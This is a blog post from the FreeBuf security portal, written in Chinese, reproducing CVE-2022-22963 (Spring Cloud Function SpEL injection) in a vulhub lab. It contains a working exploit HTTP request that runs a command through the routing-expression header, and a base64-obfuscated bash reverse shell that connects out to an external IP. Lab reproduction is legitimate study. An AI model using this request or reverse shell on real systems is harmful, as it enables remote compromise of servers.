CVE-2022-22963 代码远程执行漏洞复现 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

漏洞

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
90
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

CVE-2022-22963 代码远程执行漏洞复现

小菜鸡 2022-09-20 16:09:37 529199

所属地山东省

漏洞简介：

由于Spring CloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参数作为Spel表达式进行处理，造成了Spel表达式注入漏洞，当使用路由功能时，攻击者可利用该漏洞远程执行任意代码。

影响版本：

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

一、复现工具：

1.docker+vulhub
2.burpsuite
3.一台vps（虚拟机也可以）

docker跟vulhub安装下载就不说了，网上多的是，下面启动漏洞环境的命令

systemctl start docker 启动docker
docker-compose up -d启动漏洞环境
docker-compose down 删除漏洞环境

二、漏洞验证

1.访问8080端口

2.访问/uppercase抓包

3.更改为post包，添加post包信息

POST /functionRouter HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Upgrade-Insecure-Requests: 1
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch /tmp/webroot")
Content-Type: text/plain
Content-Length: 25

Content-Length: 7

test

4.创建成功

三、反弹 shell

1.把touch /tmp/webroot修改为反弹shell的命令

"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTIuMjI0LjIxLjE1OC8yNjI2IDA+JjE=}|{base64,-d}|{bash,-i}

2.反弹成功

# 工具 # linux # 漏洞复现 # 漏洞复现环境

本文为小菜鸡独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多

[JBoss JMXInvokerServlet 反序列化-CVE-2017-7504]

Web安全

这是经典的JBoss反序列化漏洞，JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象，然后我们利用A...

小王的黑色短裤

137051围观 · 2喜欢 2022-12-28

深入分析SEAndroid中的安全风险与关闭姿势

终端安全

无恒实验室在近期的安全研究中，对于SELinux的攻击面和攻击方法有一些研究成果，特此分享给大家，希望与业内进行学习交流。

字节跳动无恒实验室

302820围观 · 2收藏 · 6喜欢 2022-12-22

域0day-(CVE-2022-33679)容易利用吗原创

漏洞

最近twitter上关于CVE，应该是CVE-2022-33679比较火了，但是资料也是比较少，下面来唠唠吧。

蚁景科技

301659围观 · 2收藏 · 19喜欢 2022-12-15

ThinkPHP V6.0.12LTS多语言模块RCE 原创

Web安全

1、简介ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初，2007年元旦正...

小王的黑色短裤

373311围观 · 1收藏 2022-12-11

禅道V16.5 SQL注入（CNVD-2022-42853）原创

Web安全

本文只做交流学习，切勿违法犯罪！！！

小王的黑色短裤

235730围观 · 1收藏 · 9喜欢 2022-12-09

小菜鸡 LV.2

他很懒，什么都没留下

3 文章数
2 关注者

CVE-2022-22965远程代码执行漏洞复现

2022-09-20

CVE-2018-1273远程命令执行漏洞复现

2022-09-07

文章目录